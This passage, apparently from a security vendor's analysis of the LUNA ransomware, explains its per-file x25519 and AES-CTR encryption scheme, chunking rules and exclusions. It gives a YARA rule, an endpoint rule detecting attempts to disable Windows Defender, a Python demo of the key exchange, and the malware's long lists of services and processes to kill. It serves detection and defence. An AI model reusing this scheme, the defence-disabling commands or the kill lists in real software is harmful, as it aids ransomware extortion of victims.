+We compared these exclusions with those from our [CUBA Ransomware Malware Analysis](https://www.elastic.co/security-labs/cuba-ransomware-malware-analysis#excluded-directories) report. LUNA did not include the file extensions **.sys** or **.vbm** , both identified in the CUBA analysis. Also, LUNA excludes all of the **\Program Files** , **\ProgramData** , and **\AppData** directories and subdirectories, which CUBA encrypts - or has narrower exclusions to subfolders. This seems like an overly broad exclusion methodology as it misses some valuable data that would be disruptive if encrypted.
+
+## Encryption Implementation
+
+LUNA uses a multi-step encryption implementation approach designed to make the author’s decryption tool the only known way to recover targeted files.
+
+### Encryption process
+
+The malware author generates a public/private key pair before compilation and embeds the public key in the LUNA binary for later use by the malware. The author maintains the private key until the victim has met their demands.
+
+![Author generates key pair](/assets/images/luna-ransomware-attack-pattern/image1-8.jpg)
+
+> In many cases, ransomware actors generate a new “author’s” key pair for each victim organization.
+
+Within the **add_file** function, each time LUNA encounters a new file to encrypt, the malware will generate its own public/private key pair associated with that file. It does this by using the open source library [x25519-dalek](https://github.com/dalek-cryptography/x25519-dalek) x25519 elliptic curve Diffie-Hellman key exchange with [**RngCore::fill_bytes**](https://docs.rs/rand/latest/rand/trait.RngCore.html#tymethod.fill_bytes) random number generator used for entropy, which is built into Rust.
+
+![LUNA generates key pair](/assets/images/luna-ransomware-attack-pattern/image1-3.jpg)
+
+> Elliptic curve ([ECC](https://en.wikipedia.org/wiki/Elliptic-curve_cryptography)) key generation offers several performance improvements over [RSA](<https://en.wikipedia.org/wiki/RSA_(cryptosystem)>) for equivalent key size. Generally, for a given key size ECC offers greater cryptographic strength and is faster to derive a public key from a private key. This speed improvement helps when a new key pair is generated for every file to be encrypted on a victim machine.
+
+At this point, there are two sets of public/private keys: the authors and the malware’s.
+
+LUNA will then use the malware-generated private key and the author’s embedded public key to derive an AES key.
+
+![LUNA creates AES key](/assets/images/luna-ransomware-attack-pattern/image1-4.jpg)
+
+Files can then be encrypted by chunk with AES in the counter (CTR) mode and an initialization vector (IV). The hardcoded IV is the string “Luna” padded with zeros to be 16 bytes long as required by the AES-CTR cipher algorithm.
+
+![LUNA encrypts using the AES key](/assets/images/luna-ransomware-attack-pattern/image1-5.jpg)
+
+> [Initialization vectors](https://en.wikipedia.org/wiki/Initialization_vector) are broadly used in cryptography to provide input to initialize the state of the cipher algorithm before the plaintext is encrypted. In most other contexts it is randomized and shared with the public key. This randomization provides a similar function to [salt](<https://en.wikipedia.org/wiki/Salt_(cryptography)>) for hashed passwords.
+
+Using the **std::io::Seek** trait, Rust is able to abstract the OS appropriate **seek** , ie **lseek** for Linux. The malware uses this function to read data from the target file, encrypt it, and write it back to the original file.
+
+LUNA first overwrites the original file with the encrypted content, then appends the malware’s public key created for that file and the string “Luna” as a file marker. The extension **.Luna** is then added to the filename.
+
+![Adding .Luna to the filename](/assets/images/luna-ransomware-attack-pattern/image15.jpg)
+
+![LUNA public key appended to the encrypted file](/assets/images/luna-ransomware-attack-pattern/image1-6.jpg)
+
+At this point, the AES and malware’s private keys are no longer needed and must be destroyed so only the author’s private key can be used for decryption.
+
+LUNA then moves to the next file and starts again.
+
+### Decryption process
+
+In order to decrypt a file encrypted with this method we need the AES key and the IV. The IV is hardcoded into the malware and already known, however, the AES key is discarded once the file is encrypted. The AES key was initially generated using the malware’s private key and the author’s public key, but the malware’s private key has also been discarded.
+
+While we also have the malware’s public key in the encrypted file itself, the author’s private key is required, in combination with the malware's public key, to derive the AES key. The AES key in combination with the hardcoded IV can then be used to decrypt each encrypted chunk.
+
+![Decryption process](/assets/images/luna-ransomware-attack-pattern/image1-7.jpg)
+
+Below you can see a graphic outlining the encryption and decryption process of the LUNA ransomware.
+
+![Encryption/decryption process overview](/assets/images/luna-ransomware-attack-pattern/image1.jpg)
+
+### Chunk encryption
+
+Like many ransomware families, LUNA encrypts files differently based on size. This serves to enhance performance and allows the ransomware to make a larger volume of data unusable in a shorter period of time.
+
+If the file is smaller than **320** kB the entire contents of the file are encrypted using the above-described method. If the file size is between **320** kB and approximately **3** MB then only the first **320** kB will be encrypted. For files larger than approximately **3** MB LUNA will encrypt **320** kB chunks deriving the space between chunks by a byte value calculated at run-time based on the file size.
+
+### LUNA encryption POC
+
+If you're interested in trying this out yourself to see the encryption/decryption process in action, check out Elastic's Malware Analysis and Reverse Engineering (MARE) team's Python POC in the LUNA Encryption POC Appendix. This script illustrates the implementation of the LUNA encryption/decryption mechanism.
+
+![LUNA encryption POC](/assets/images/luna-ransomware-attack-pattern/image16.jpg)
+
+## Summary
+
+The samples were nearly identical in their core functionality of the -dir and -file execution paths, the encryption mechanisms utilized, and hard-coded values. Hardcoded value similarities include:
+
+- Extension exclusion values
+- Folder exclusion values
+- Initialization vector
+- Author’s public key
+- Ransomware note
+
+The most obvious difference between the two LUNA samples we looked at is the enhanced functionality of the Windows PE sample when provided no arguments and the adherence to the extension and folder exclusions for Windows.
+
+There are many differences between the two OS packages; it is probably more convenient to provide a single decryption tool for all endpoints ransomed, irrespective of the OS. A uniform encryption and decryption framework could indicate that the LUNA ransomware is used in a [Ransomware-as-a-Service](https://www.trendmicro.com/vinfo/us/security/definition/ransomware-as-a-service-raas) implementation or that LUNA is provided as a kit that can be tailored to specific campaigns.
+
+These differences and similarities lead us to the following assessments of these samples:
+
+1. The Windows sample is much more mature than the Linux sample as reflected in the drive enumeration, services disable/stop, process termination, and exclusions employed to enable the malware to be deployed broadly with little detailed knowledge of the victim machines.
+2. The Linux sample contains vestigial Windows features. The exclusions could be modified to fit some specific Linux distributions, but it could be a challenge to create one list that has broad coverage in the diverse Linux ecosystem.
+3. The service disable/stop and process terminate lists are very large when compared to other mature ransomware samples. While it does not impede the encryption function of the malware, it generates a tremendous amount of noise that could alert defenders. Calling **sc config [service] start=disabled** and **net stop** 253 times for many services that do not exist, or **taskkill /im** 997 times for processes that do not exist provides an excellent opportunity to interdict ransomware execution before encryption begins. This would be much quieter with prior service and process enumeration, as is common with other ransomware campaigns.
+4. The Linux sample did not include the safeguards built into the Windows variant. This caused the Linux sample to encrypt files needed to validate entitlements to system files, such as the **sudoers** and **passwd** files. Possibilities, why the Linux sample did not include safeguards :
+
+   1. the malware authors did not have a firm enough understanding of Linux system files and directories to know what should be excluded;
+   2. a time constraint prevented the completion of a mature Linux sample;
+   3. a lack of widely available ransomware exclusions lists for Linux;
+   4. inclusion of a Linux sample was opportunistic because the sample was developed in Rust, which is cross-platform; or
+   5. Linux capabilities were included as a “selling point” for a Ransomware-as-a-Service offering
+
+## Observed Adversary Tactics and Techniques
+
+### Tactics
+
+Using the MITRE ATT&CK® framework, tactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.
+
+- [Discovery](https://attack.mitre.org/tactics/TA0007)
+- [Defense Evasion](https://attack.mitre.org/tactics/TA0005)
+- [Impact](https://attack.mitre.org/tactics/TA0040)
+
+### Techniques / sub techniques
+
+Techniques and Sub techniques represent how an adversary achieves a tactical goal by performing an action.
+
+Observed techniques/sub techniques:
+
+- [Indicator Removal on Host](https://attack.mitre.org/techniques/T1070/)
+- [File and Directory Discovery](https://attack.mitre.org/techniques/T1083)
+- [System Service Discovery](https://attack.mitre.org/techniques/T1007/)
+- [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486)
+
+## Detections
+
+Our detection/protection philosophy regarding ransomware focuses on pre-encryption detection when defenders still have an opportunity to interdict malware execution before data is lost.
+
+### YARA
+
+For LUNA Windows and Linux variants, the [YARA rule below](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Multi_Ransomware_Luna.yar) detects strings embedded in the malware and byte sequences related to core functionality.
+
+```
+rule Multi_Ransomware_LUNA {
+    meta:
+        Author = “Elastic Security”
+        creation_date = "2022-08-02"
+        os = "Linux, Windows"
+        arch = "x86"
+        category_type = "Ransomware"
+        family = "LUNA"
+        threat_name = "Multi.Ransomware.LUNA"
+        reference_sample = "1cbbf108f44c8f4babde546d26425ca5340dccf878d306b90eb0fbec2f83ab51"
+    strings:
+        $str_extensions = ".ini.exe.dll.lnk"
+        $str_ransomnote_bs64 = "W1dIQVQgSEFQUEVORUQ/XQ0KDQpBbGwgeW91ciBmaWxlcyB3ZXJlIG1vdmVkIHRvIHNlY3VyZSBzdG9yYWdlLg0KTm9ib"
+        $str_path = "/home/username/"
+        $str_error1 = "Error while writing encrypted data to:"
+        $str_error2 = "Error while writing public key to:"
+        $str_error3 = "Error while renaming file:"
+        $chunk_calculation0 = { 48 8D ?? 00 00 48 F4 48 B9 8B 3D 10 B6 9A 5A B4 36 48 F7 E1 48 }
+        $chunk_calculation1 = { 48 C1 EA 12 48 89 D0 48 C1 E0 05 48 29 D0 48 29 D0 48 3D C4 EA 00 00 }
+    condition:
+        5 of ($str_*) or all of ($chunk_*)
+}
+```
+
+### Endpoint rules
+
+For Windows LUNA there is the opportunity to prevent execution before encryption in the “no arguments” execution flow. As outlined in the previous sections, this execution flow attempts to disable and stop 253 services and terminate 997 processes whether or not they exist on the victim machine.
+
+Our Threat Research And Detection Engineering team (TRADE) tuned and promoted [a behavioral endpoint rule](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_attempt_to_disable_windows_defender_services.toml) targeting these pre-encryption environmental preparation TTPs.
+
+The below rule identifies and prevents attempts to disable the Windows Defender services.
+
+```
+query = '''
+process where event.action == "start" and
+  process.pe.original_file_name : ("net.exe", "sc.exe", "cmd.exe") and
+  process.command_line : ("*disabled*", "*stop*") and process.command_line : ("*WdNisSvc*", "*WinDefend*") and
+    (process.parent.executable :
+                    ("?:\\Windows\\Microsoft.NET\\*",
+                     "?:\\Users\\*",
+                     "?:\\ProgramData\\*") or
+    process.parent.name : ("rundll32.exe", "regsvr32.exe", "wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe"))
+'''
+
+optional_actions = []
+[[actions]]
+action = "kill_process"
+field = "process.entity_id"
+state = 0
+```
+
+## References
+
+The following were referenced throughout the above research:
+
+- [https://securelist.com/LUNA-black-basta-ransomware/106950/](https://securelist.com/luna-black-basta-ransomware/106950/)
+- [https://www.virustotal.com/gui/file/1cbbf108f44c8f4babde546d26425ca5340dccf878d306b90eb0fbec2f83ab51](https://www.virustotal.com/gui/file/1cbbf108f44c8f4babde546d26425ca5340dccf878d306b90eb0fbec2f83ab51/)
+- [https://www.virustotal.com/gui/file/ad8d568811e05e12cde78f76c3b7cbbde0d20aee5b4e918a3a8d515f5e242bb6](https://www.virustotal.com/gui/file/ad8d568811e05e12cde78f76c3b7cbbde0d20aee5b4e918a3a8d515f5e242bb6)
+
+## Appendix
+
+### LUNA encryption POC
+
+We are providing an encryption POC, written in Python, that mimics and visualizes the encryption implementation of the LUNA ransomware.
+
+Note: like LUNA, each time the script is run, the encrypted output will be different because the private keys are generated each time.
+
+**Prerequisites:**
+
+- Pyton 3
+- **cryptography** and **termcolor** Python modules
+
+**Usage:**
+
+- Save the below script as **luna_encryption_poc.py**
+- install the dependencies with **pip install --user cryptography termcolor**
+- execute the script with **python luna_encryption_poc.py**
+
+```
+from cryptography.hazmat.primitives import serialization
+from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
+from cryptography.hazmat.primitives.asymmetric import x25519
+
+from termcolor import colored
+
+# Malware author generates public key and embeds into malware, keeps private key for decryption later
+author_private_key = x25519.X25519PrivateKey.generate()         # Unknown author's priv_key generation method
+author_embedded_public_key = author_private_key.public_key()
+
+# Malware generates key pair
+malware_private_key = x25519.X25519PrivateKey.generate()
+malware_public_key = malware_private_key.public_key()
+
+# Serialization of malware pub_key
+malware_public_bytes = malware_public_key.public_bytes(encoding=serialization.Encoding.Raw,
+  format=serialization.PublicFormat.Raw)
+print("Malware Public Key:  ", colored(malware_public_bytes.hex(), "blue"))
+
+# AES key generated by malware's private key and author's embedded public key
+# malware_private_key is discarded after this step and not needed for decryption
+shared_key_generated = malware_private_key.exchange(author_embedded_public_key)
+print("Generated Shared Key (AES): " + colored(shared_key_generated.hex(), "cyan"))
+
+# Encryption Step with AES + IV null-padded LUNA string
+iv = bytearray(b'4c756e6100000000')                             # 'Luna....' 16 bytes sized needed for AES CTR
+
+# AES stream cipher (CTR) created using AES shared key and IV
+cipher = Cipher(algorithms.AES(shared_key_generated), modes.CTR(iv))
+encryptor = cipher.encryptor()
+
+# String to be encrypted
+plaintext = b"You know, for search!"
+print("Plaintext: ", colored(plaintext, "green"))
+print("Plaintext.hex(): ", colored(plaintext.hex(), "green"))
+
+# Encryption of string using AES stream cipher
+ct = encryptor.update(plaintext) + encryptor.finalize()
+
+# Mock encrypted file with cipher text + public bytes + file marker
+file_marker = b"Luna"                                           # 0x4c756e61
+encrypted_file = ct + malware_public_bytes + file_marker
+
+file_ciphertext = encrypted_file[:-36]
+pub_key_from_encrypted_file = encrypted_file[-36:-4]
+file_marker_from_encrypted_file = encrypted_file[-4:]
+
+print("Encrypted File contents: \n",
+    colored(file_ciphertext.hex(), "red"),
+    colored(pub_key_from_encrypted_file.hex(), "blue"),
+    colored(file_marker_from_encrypted_file.hex(), "yellow"))
+print("\t",
+    colored("Encrypted content", "red"), "        ",
+    colored("Embedded malware's pub_key", "blue"), "       ",
+    colored("Embedded file marker", "yellow"))
+
+# Serialization
+malware_public_key_from_file = x25519.X25519PublicKey.from_public_bytes(pub_key_from_encrypted_file)
+
+# AES key derived from author's private key and malware embedded public key
+shared_key_derived = author_private_key.exchange(malware_public_key_from_file)
+print("Derived Shared Key (AES): ", colored(shared_key_derived.hex(), "cyan"))
+
+# Decryption using derived AES shared key and IV
+redo_cipher = Cipher(algorithms.AES(shared_key_derived), modes.CTR(iv))
+decryptor = redo_cipher.decryptor()
+result = decryptor.update(file_ciphertext) + decryptor.finalize()
+print("Decrypted plaintext: ", colored(result, "green"))
+```
+
+This Python script will display the malware public key, the shared AES key, the plain text as a string, the plain text as a hex value, the encrypted text, and finally decrypt the encrypted text back into the original plain text as a string.
+
+![LUNA encryption POC output](/assets/images/luna-ransomware-attack-pattern/image2.jpg)
+
+### Windows services termination list
+
+|                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        |                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          |                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               |
+| -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
+| Acronis VSS ProviderAcronisAgentAcrSch2SvcAdobeARMserviceAlerterARSMaswBccavbackupBackupExecAgentAcceleratorBackupExecAgentBrowserBackupExecDeviceMediaServiceBackupExecJobEngineBackupExecManagementServiceBackupExecRPCServiceBackupExecVSSProviderbcrservicebedbgBITSBlueStripeCollectorBrokerInfrastructureccEvtMgrccSetMgrCissesrvCpqRcmc3CSAdminCSAuthCSDbSyncCSLogCSMonCSRadiusCSTacacsDB2DB2-0DB2DAS00DB2GOVERNOR_DB2COPY1DB2INST2DB2LICD_DB2COPY1DB2MGMTSVC_DB2COPY1DB2REMOTECMD_DB2COPY1DCAgentEhttpSrvekrnEnterprise Client Serviceepag EPIntegrationService EPProtectedService epredline EPSecurityServiceEPSecurityService EPUpdateServiceEPUpdateService EraserSvc11710ERSvcEsgShKernelESHASRVEventlogFA_SchedulerGoogleChromeElevationServicegupdategupdatemHealthServiceIBMDataServerMgrIBMDSServer41IDriverTIISAdminIMAP4SvcImapiServiceklnagentLogProcessorServiceLRSDRVXmacmnsvcmasvcMBAMServiceMBEndpointAgentMcShieldMcTaskManagermfefiremfemmsmfevtpmfewcMMSMozyprobackupMsDtsServerMsDtsServer100MsDtsServer110 | MsDtsServer130MSExchangeESMSExchangeISMSExchangeMGMTMSExchangeMTAMSExchangeSAMSExchangeSRSmsftesql$PRODMSMQ MSOLAP$SQL_2008MSOLAP$SYSTEM\_BGCMSOLAP$TPSMSOLAP$TPSAMAMSSQL$BKUPEXECMSSQL$CITRIX\_METAFRAMEMSSQL$ECWDB2MSSQL$EPOSERVERMSSQL$ITRISMSSQL$NET2MSSQL$PRACTICEMGTMSSQL$PRACTTICEBGCMSSQL$PRODMSSQL$PROFXENGAGEMENTMSSQL$SBSMONITORINGMSSQL$SHAREPOINTMSSQL$SQL_2008MSSQL$SQLEXPRESSMSSQL$SYSTEM_BGCMSSQL$TPSMSSQL$TPSAMAMSSQL$VEEAMSQL2008R2MSSQL$VEEAMSQL2012MSSQLFDLauncherMSSQLFDLauncher$ITRISMSSQLFDLauncher$PROFXENGAGEMENTMSSQLFDLauncher$SBSMONITORINGMSSQLFDLauncher$SHAREPOINTMSSQLFDLauncher$SQL\_2008MSSQLFDLauncher$SYSTEM_BGCMSSQLFDLauncher$TPSMSSQLFDLauncher$TPSAMAMSSQLLaunchpad$ITRISMSSQLSERVERMSSQLServerADHelperMSSQLServerADHelper100MSSQLServerOLAPServicemsvsmon90MySQL57Net2ClientSvcNetDDENetMsmqActivatorNetSvcNimbusWatcherServiceNtLmSspNtmsSvcntrtscanodservOracleClientCache80osePDVFSServicePOP3SvcProLiantMonitorReportServerReportServer$SQL_2008ReportServer$SYSTEM\_BGCReportServer$TPSReportServer$TPSAMARESvcRSCDsvcsacsvrSamSsSAVServiceSDD_ServiceSDRSVCSentinelAgentSentinelHelperServiceSentinelStaticEngineSepMasterServiceSepMasterServiceMigShMonitorSmcinstSmcServiceSMTPSvcSNAC | SnowInventoryClientSntpServiceSQL BackupsSQLAgent$BKUPEXECSQLAgent$CITRIX_METAFRAMESQLAgent$CXDBSQLAgent$ECWDB2SQLAgent$EPOSERVERSQLAgent$ITRISSQLAgent$NET2SQLAgent$PRACTTICEBGCSQLAgent$PRACTTICEMGTSQLAgent$PRODSQLAgent$PROFXENGAGEMENTSQLAgent$SBSMONITORINGSQLAgent$SHAREPOINTSQLAgent$SQL_2008SQLAgent$SQLEXPRESSSQLAgent$SYSTEM_BGCSQLAgent$TPSSQLAgent$TPSAMASQLAgent$VEEAMSQL2008R2SQLAgent$VEEAMSQL2012SQLBrowserSQLsafe Backup ServiceSQLsafe Filter ServiceSQLSafeOLRServiceSQLSERVERAGENTSQLTELEMETRYSQLTELEMETRY$ECWDB2SQLTELEMETRY$ITRISSQLWriterSSISTELEMETRY130SstpSvcsvcGenericHostswi_filterswi_serviceswi_updateswi_update_64SymantecSymantec System RecoverysysdownSystemTelemetryserverTlntSvrTmCCSFtmlistenTmPfw tpautoconnsvcTPVCGatewayTrueKeyTrueKeySchedulerTrueKeyServiceHelperTSMUI0DetectVeeam Backup Catalog Data ServiceVeeamBackupSvcVeeamBrokerSvcVeeamCatalogSvcVeeamCloudSvcVeeamDeploymentServiceVeeamDeploySvcVeeamEnterpriseManagerSvcVeeamHvIntegrationSvcVeeamMountSvcVeeamNFSSvcVeeamRESTSvcVeeamTransportSvcVGAuthServiceVMToolsVMwareVMwareCAFCommAmqpListenerVMwareCAFManagementAgentHostvmware-converter-agentvmware-converter-servervmware-converter-workerW3SvcwbengineWdNisSvcWebClientWinDefendWinVNC4WRSVCZoolz 2 Service |
+
+### Windows process termination list
+
+|                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         |                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       |                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       |
+| ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
+| a2service.exea2start.exeaawservice.exeacaas.exeacaegmgr.exeacaif.exeacais.exeacctmgr.exeaclient.exeaclntusr.exead-aware2007.exeadministrator.exeadminserver.exeaesecurityservice.exeaexagentuihost.exeaexnsagent.exeaexnsrcvsvc.exeaexsvc.exeaexswdusr.exeaflogvw.exeafwserv.exeagntsvc.exeahnrpt.exeahnsd.exeahnsdsv.exealert.exealertsvc.exealmon.exealogserv.exealsvc.exealunotify.exealupdate.exealuschedulersvc.exeamsvc.exeamswmagtaphost.exeappsvc32.exeaps.exeapvxdwin.exeashbug.exeashchest.exeashcmd.exeashdisp.exeashenhcd.exeashlogv.exeashmaisv.exeashpopwz.exeashquick.exeashserv.exeashsimp2.exeashsimpl.exeashskpcc.exeashskpck.exeashupd.exeashwebsv.exeasupport.exeaswdisp.exeaswregsvr.exeaswserv.exeaswupdsv.exeaswwebsv.exeatrshost.exeatwsctsk.exeaupdrun.exeaus.exeauth8021x.exeautoup.exeavcenter.exeavconfig.exeavconsol.exeavengine.exeavesvc.exeavfwsvc.exeavkproxy.exeavkservice.exeavktray.exeavkwctl.exeavltmain.exeavmailc.exeavmcdlg.exeavnotify.exeavscan.exeavscc.exeavserver.exeavshadow.exeavsynmgr.exeavtask.exeavwebgrd.exebasfipm.exebavtray.exebcreporter.exebcrservice.exebdagent.exebdc.exebdlite.exebdmcon.exebdredline.exebdss.exebdsubmit.exebhipssvc.exebka.exeblackd.exeblackice.exebluestripecollector.exeblupro.exebmrt.exebwgo0000ca.execaantispyware.execaav.execaavcmdscan.execaavguiscan.execaf.execafw.execaissdt.execalogdump.execapfaem.execapfasem.execapfsem.execapmuamagt.execappactiveprotection.execasc.execasecuritycenter.execaunst.execavrep.execavrid.execavscan.execavtray.execcap.execcapp.execcemflsv.execcenter.execcevtmgr.execcflic0.execcflic4.execclaw.execcm messaging.execcnfagent.execcprovsp.execcproxy.execcpxysvc.execcschedulersvc.execcsetmgr.execcsmagtd.execcsvchst.execcsystemreport.execctray.execcupdate.execdm.execertificateprovider.execertificationmanagerservicent.execfftplugin.execfnotsrvd.execfp.execfpconfg.execfpconfig.execfplogvw.execfpsbmit.execfpupdat.execfsmsmd.execheckup.exechrome.execis.execistray.execka.execlamscan.execlamtray.execlamwin.execlient.execlient64.execlps.execlpsla.execlpsls.execlshield.execmdagent.execmdinstall.execmgrdian.execntaosmgr.execollwrap.execomhost.execonfig_api_service.execonsole.execontrol_panel.execoreframeworkhost.execoreserviceshell.execpd.execpdclnt.execpf.execpntsrv.execramtray.execrashrep.execrdm.execrssvc.execsacontrol.execsadmin.execsauth.execsdbsync.execsfalconservice.execsinject.execsinsm32.execsinsmnt.execslog.execsmon.execsradius.execsrss_tc.execssauth.execstacacs.exectdataload.execwbunnav.execylancesvc.execylanceui.exedao_log.exedbeng50.exedbserv.exedbsnmp.exedbsrv9.exedefwatchdefwatch.exedeloeminfs.exedeteqt.agent.exediskmon.exedjsnetcn.exedlservice.exedltray.exedolphincharge.edolphincharge.exedoscan.exedpmra.exedr_serviceengine.exedrwagntd.exedrwagnui.exedrweb.exedrweb32.exedrweb32w.exedrweb386.exedrwebcgp.exedrwebcom.exedrwebdc.exedrwebmng.exedrwebscd.exedrwebupw.exedrwebwcl.exedrwebwin.exedrwinst.exedrwupgrade.exedsmcad.exedsmcsvc.exedwarkdaemon.exedwengine.exedwhwizrd.exedwnetfilter.exedwrcst.exedwwin.exeedisk.exeeeyeevnt.exeegui.exeehttpsrv.exeekrn.exeelogsvc.exeemlibupdateagentnt.exeemlproui.exeemlproxy.exeencsvc.exeendpointsecurity.exeengineserver.exeentitymain.exeepmd.exeera.exeerlsrv.exeesecagntservice.exeesecservice.exeesmagent.exeetagent.exeetconsole3.exeetcorrel.exeetloganalyzer.exeetreporter.exeetrssfeeds.exeetscheduler.exeetwcontrolpanel.exeeuqmonitor.exeeventparser.exeevtarmgr.exeevtmgr.exeevtprocessecfile.exeewidoctrl.exeexcel